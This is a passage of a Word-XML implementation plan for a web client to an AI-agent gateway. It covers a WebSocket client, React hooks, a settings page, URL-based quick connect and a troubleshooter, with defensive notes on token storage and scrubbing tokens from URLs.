        <w:t xml:space="preserve">  onStatusChange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onHello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HelloOk)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onChatEvent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ChatEventPayload)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onAgentEvent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AgentEventPayload)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onEvent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EventFrame)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onClose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GatewayClient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GatewayConnectionConfig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GatewayClientEvents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connectNonce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connectSent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connectTimer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backoffMs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reconnectTimer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lastSeq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tickTimer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setInterval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helloPayload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HelloOk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GatewayClientEvents)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(events)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ConnectionStatus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isConnected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HelloOk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helloPayload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Update event handlers (e.g. when React re-renders)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setEvents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GatewayClientEvents)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Connect to a Gateway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GatewayConnectionConfig)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Disconnect and stop reconnecting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Send an RPC request and await the response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'Gateway not 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`RPC timeout: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RPC_TIMEOUT_MS)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(payload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(frame))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Private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onStatusChange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reconnectTimer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connectTimer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tickTimer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flushPending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closed'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connectNonce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Validate URL before connecting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'./types'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validateGatewayUrl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gateway URL'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Token is NEVER sent as a URL query parameter.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params leak into server logs, browser history, Referer headers,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proxy logs. The token is sent inside the connect handshake body over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encrypted WS connection.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(wsUrl)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a timeout for the connect handshake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 timeout'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timeout — no challenge received'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scheduleReconnect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CONNECT_TIMEOUT_MS)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'handshaking'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Wait for server to send connect.challenge event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(the connectTimer handles timeout)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flushPending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`Gateway closed (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onClose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scheduleReconnect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onerror fires before onclose — actual handling in onclose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Defensive parsing — never trust data from the wire.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Malformed frames are dropped silently (fail closed).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malformed JSON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Validate frame shape before processing.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have a 'type' field that matches known frame types.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frame))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shapeless frames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EventFrame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invalid events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invalid responses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handleResponse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Unknown frame type — drop it (fail closed)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handleEvent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EventFrame)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Connect challenge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'connect.challenge'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ConnectChallenge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(nonce)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connectNonce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Sequence tracking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`[gateway] seq gap: expected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got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Chat events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ChatEventPayload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onChatEvent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Agent events (tool calls, etc.)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AgentEventPayload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onAgentEvent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Tick (keepalive)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action needed — the server sends these to keep the connection alive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Shutdown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'shutdown'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'[gateway] Server shutting down:'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Forward all other events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onEvent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handleResponse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ResponseFrame)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pending)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(pending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 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retryable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connectTimer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hasSubtle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ConnectParams[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usedStoredDeviceToken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Build device identity (if WebCrypto available and not insecure mode)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(hasSubtle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insecureAuth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getDeviceIdentity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(identity)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Check for stored device token (from prior pairing)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getStoredDeviceToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(identity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(storedToken) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            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storedToken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usedStoredDeviceToken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Sign the challenge nonce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signedAtMs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buildSignPayload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clientMode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signedAtMs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connectNonce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signChallenge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(identity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privateKey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signedAt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signedAtMs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connectNonce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'[gateway] Device identity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Build auth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ConnectParams[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authToken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Build connect params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minProtocol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PROTOCOL_VERSION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CLIENT_MODE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hello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HelloOk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Store device token if issued ──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(hello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deviceToken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device)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storeDeviceToken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hello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hello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hello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helloPayload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backoffMs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onHello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(hello)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we used a stored device token and it failed, clear it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(usedStoredDeviceToken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device)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clearDeviceToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(device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scheduleReconnect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backoffMs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backoffMs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backoffMs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flushPending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step-2.5-react-hooks-for-gateway"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.5: React Hooks for Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/gateway/hooks.ts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GatewayClient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useGatewayStore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'@/stores/gateway-store'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useChatStore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'@/stores/chat-store'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ChatEventPayload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GatewayConnectionConfig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Singleton client instance (shared across the app) */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clientInstance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GatewayClient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getGatewayClient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GatewayClient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clientInstance) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    clientInstance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GatewayClient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Hook to manage Gateway connection lifecycle.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Mount this ONCE at the app layout level.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useGatewayConnection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useGatewayStore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setHello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useGatewayStore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setHello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useGatewayStore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handleChatEvent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handleChatEvent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getGatewayClient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setEvents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onStatusChange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(status)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(hello)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setHello</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(hello)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onChatEvent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handleChatEvent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'[gateway]'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(config) {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Don't disconnect on unmount — keep connection alive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disconnect when user explicitly disconnects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handleChatEvent])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GatewayConnectionConfig)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useGatewayStore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setConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cfg)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clientRef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clientRef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GatewayConnectionConfig)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HelloOk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temporary client for testing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GatewayClient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test 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setEvents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onHello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(hello)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(hello)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(cfg)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testConnection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Hook for chat operations in a specific project.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getGatewayClient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setLoading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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId])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loadingByProject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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isConnected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connected to Gateway'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Add user message to local store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to Gateway — idempotencyKey is REQUIRED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idempotencyKey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'chat.send'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sessionKey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idempotencyKey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abortGeneration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'chat.abort'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sessionKey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sessionKey])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'chat.history'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sessionKey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sessionKey])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sendMessage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abortGeneration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phase-3-connection-setup-ui"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 3: Connection Setup UI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~2.5 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: Phase 1, Phase 2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Token never in localStorage, URL param token scrubbing, insecure connection warnings</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="55" w:name="step-3.1-gateway-store"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3.1: Gateway Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/stores/gateway-store.ts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persist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'zustand/middleware'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GatewayConnectionConfig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HelloOk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'@/lib/gateway/types'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'handshaking'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GatewayState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GatewayConnectionConfig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HelloOk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GatewayConnectionConfig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HelloOk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Load connection config from Supabase (decrypts token server-side) */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  loadFromSupabase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useGatewayStore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GatewayState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setStatus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config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setHello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(hello)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hello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errorMessage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loadFromSupabase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Fetch the decrypted connection from Supabase server-side function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createClient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'@/lib/supabase/client'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'get_gateway_connection'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gateway_token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'clawspace-gateway'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partialize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Only persist the gateway URL, NEVER the token.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token is loaded from Supabase (encrypted) on each session start.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prevents token theft via localStorage access (XSS, browser extensions,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shared computers, dev tools).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Strip token and password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 — CRITICAL:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The gateway token provides full operator access to the user’s AI agent, including shell execution. It must NEVER be stored in localStorage or sessionStorage. The flow is:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. User enters token in settings → saved to Supabase via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">save_gateway_connection()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(encrypted with pgcrypto)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. On page load →</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">loadFromSupabase()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">decrypts and loads into memory-only Zustand state</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. On tab close → token is gone from browser memory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. On next visit → token is re-fetched from Supabase (requires authentication)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Device tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(issued by the Gateway after pairing) ARE acceptable in localStorage because they are: scoped to a specific device, rotatable, revocable, and useless without the device’s private key.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="56" w:name="step-3.2-settings-connection-page"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3.2: Settings / Connection Page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/(app)/settings/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a settings page with: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Connection Section:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gateway URL input (text) with protocol hint (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ws:// or wss://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 Validate URL on blur with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">validateGatewayUrl()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— reject non-ws/wss protocols</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 Show orange warning banner if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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is used on a non-localhost address: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⚠️ Unencrypted connection — your gateway token will be sent in plaintext. Use wss:// (Tailscale Serve) for secure connections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rP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Token input (password field, with show/hide toggle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 Token is sent to Supabase via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">save_gateway_connection()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RPC — never stored client-side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 Show/hide toggle, but default to hidden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 Autocomplete disabled (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">autoComplete="off"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Allow insecure auth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">toggle (checkbox, with warning text about device identity)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1016"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">🔒 Show explicit warning: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Disables device identity verification. Only use on trusted networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rP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Test Connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">button → shows success (server version, protocol, features) or error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Save &amp; Connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">button → stores encrypted in Supabase via RPC + loads into Zustand memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1013"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connection status indicator with live state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Tailscale Guidance Section</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(informational):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Heading:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Connecting via Tailscale (Recommended)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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install Tailscale on both machines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the Gateway host:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openclaw gateway --tailscale serve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="101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wss://&lt;magicdns&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as the Gateway URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1018"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Token-based auth or Tailscale identity auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Link to OpenClaw Tailscale docs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Account Section:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Email (read-only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sign out button</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="step-3.3-url-based-quick-connect"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3.3: URL-Based Quick Connect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Frictionless onboarding — users can click a link or scan a QR code from their Gateway to connect instantly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the root layout or a dedicated route handler, check URL params on app load:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/(app)/layout.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(client component wrapper):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useSearchParams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useGatewayStore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'@/stores/gateway-store'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validateGatewayUrl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'@/lib/gateway/types'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QuickConnectHandler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useGatewayStore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setConfig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'gatewayUrl'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(gatewayUrl)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Validate the URL before accepting it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validateGatewayUrl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(gatewayUrl)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'[quick-connect] Invalid gateway URL:'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config in memory (token stays in Zustand memory, NOT localStorage)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insecureAuth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'insecure'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If user is authenticated, immediately persist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connection to Supabase (encrypted) so the token doesn't need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 stay in-memory or be passed around.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'@/lib/supabase/client'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(({ createClient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'save_gateway_connection'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p_name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p_gateway_url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p_gateway_token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Strip sensitive params from URL IMMEDIATELY.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This prevents token leakage via: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 Browser history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 Referer headers on outbound requests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 Browser extensions that read URLs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 Screen sharing / screenshots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 Server access logs (if URL is visited server-side)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'gatewayUrl'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'insecure'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[searchParams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The quick-connect URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?token=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is a convenience feature with inherent risks. The token appears in browser history and potentially in server logs. Mitigations:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Token is stripped from URL immediately on load (before any outbound requests)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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">header prevents full URL in referrers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Token is persisted to Supabase (encrypted) and removed from the URL in one atomic operation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Users should be advised to use this feature only over HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supported URL format:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://clawspace.app/?gatewayUrl=wss://my-server.tail1234.ts.net&amp;token=abc123</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="X5c6080dcf41a5a27af5101169c7813b116a0d3c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3.4: Connection Health / Troubleshooter Page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/(app)/connect/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A diagnostic page that helps users troubleshoot connection issues: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Connected / Disconnected / Error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Connectivity Checks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Is the Gateway URL reachable? (try WS connection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Is the token valid? (did handshake succeed?)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Is device identity working? (WebCrypto available? Secure context?)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Protocol version match?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Common Issues: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→ Gateway not running, wrong port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Device identity required</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Need HTTPS or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allowInsecureAuth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Protocol mismatch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ OpenClaw version too old/new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Token rejected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ Wrong token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Gateway Info (when connected):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server version, protocol version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Available methods and events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uptime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Active sessions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phase-4-project-spaces"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 4: Project Spaces</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~3 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: Phase 1 (database), Phase 3 (connection)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Input validation on project names, session key integrity, project ID validation in routes</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="60" w:name="step-4.1-project-store"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4.1: Project Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/stores/project-store.ts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ProjectState {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setProjects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setActiveProject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removeProject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useProjectStore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setProjects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projects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setActiveProject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(activeProjectId)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activeProjectId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project]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updates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removeProject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(loading)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loading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60"/>
    <w:bookmarkStart w:id="61" w:name="step-4.2-project-crud-operations"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4.2: Project CRUD Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
